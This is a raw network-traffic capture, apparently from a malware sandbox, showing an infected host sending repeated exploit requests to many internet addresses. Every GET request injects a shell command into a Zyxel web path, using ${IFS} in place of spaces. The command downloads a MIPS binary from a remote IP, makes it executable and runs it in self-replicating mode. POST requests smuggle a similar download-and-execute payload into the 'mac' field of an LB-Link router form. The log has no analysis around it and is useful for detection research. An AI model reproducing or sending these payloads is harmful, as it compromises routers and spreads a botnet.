                                            Feb 2, 2024 06:21:05.499556065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2613192.168.2.154851673.206.25.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499597073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2614192.168.2.156023468.15.20.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499650955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2615192.168.2.1543774122.108.183.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499670029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2616192.168.2.1549080137.163.224.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499730110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2617192.168.2.1541638153.41.155.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499764919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2618192.168.2.153608069.76.229.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499815941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2619192.168.2.155712096.56.155.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499845982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2620192.168.2.1532972154.114.145.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499901056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2621192.168.2.1539666198.21.195.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499946117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2622192.168.2.1542288134.94.196.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499968052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2623192.168.2.154201066.151.177.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.499999046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2624192.168.2.1541196141.211.162.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.500068903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2625192.168.2.1550626146.255.189.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.500143051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2626192.168.2.156099877.248.105.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.500170946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2627192.168.2.1541114113.1.204.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.500188112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2628192.168.2.1551658188.9.163.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.500226021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2629192.168.2.154479098.44.0.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.500247002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2630192.168.2.1549088186.158.163.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.503742933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2631192.168.2.156051091.36.137.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.503776073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2632192.168.2.1559026189.17.110.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.503799915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2633192.168.2.1553224216.122.152.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.503856897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2634192.168.2.1539586108.23.173.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.503887892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2635192.168.2.153841425.31.46.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.503915071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2636192.168.2.155493024.119.115.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.503953934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2637192.168.2.155481860.223.41.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.503979921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2638192.168.2.155629475.96.174.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504029989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2639192.168.2.1533800147.29.65.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504095078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2640192.168.2.1555042144.60.76.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504121065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2641192.168.2.1556324218.158.209.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504144907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2642192.168.2.155842614.28.173.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504184961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2643192.168.2.1558916192.163.241.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504230976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2644192.168.2.1557966223.35.96.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504273891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2645192.168.2.1555020106.227.106.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504311085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2646192.168.2.153730490.225.239.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504371881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2647192.168.2.1549452193.238.182.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504419088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2648192.168.2.1553070154.218.169.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504460096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2649192.168.2.1537358145.205.131.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.504492044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2650192.168.2.1558434148.80.71.1348080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.106741905 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2651192.168.2.1548484104.17.30.918080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.121722937 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:06.238822937 CET328INHTTP/1.1 400 Bad Request
                                            Server: cloudflare
                                            Date: Fri, 02 Feb 2024 05:21:06 GMT
                                            Content-Type: text/html
                                            Content-Length: 155
                                            Connection: close
                                            CF-RAY: -
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2652192.168.2.1540264203.176.126.1038080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.384253979 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2653192.168.2.1555118178.124.47.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.498641968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2654192.168.2.1557048123.232.142.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.498694897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2655192.168.2.1539704145.188.123.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.498737097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2656192.168.2.153842271.118.129.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.498789072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2657192.168.2.1552794140.23.47.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.498822927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2658192.168.2.1558372170.130.227.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.498881102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2659192.168.2.1550612124.245.81.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.498934984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2660192.168.2.153626868.124.134.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.498935938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2661192.168.2.1546008178.7.33.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.498975992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2662192.168.2.1559304181.224.212.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499032974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2663192.168.2.1552580183.237.201.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499078035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2664192.168.2.1556092168.182.204.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499131918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2665192.168.2.15346162.130.62.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499162912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2666192.168.2.1538380141.240.235.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499202013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2667192.168.2.1534594201.215.235.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.499249935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2668192.168.2.1541070219.53.79.221443
                                            TimestampBytes transferredDirectionData
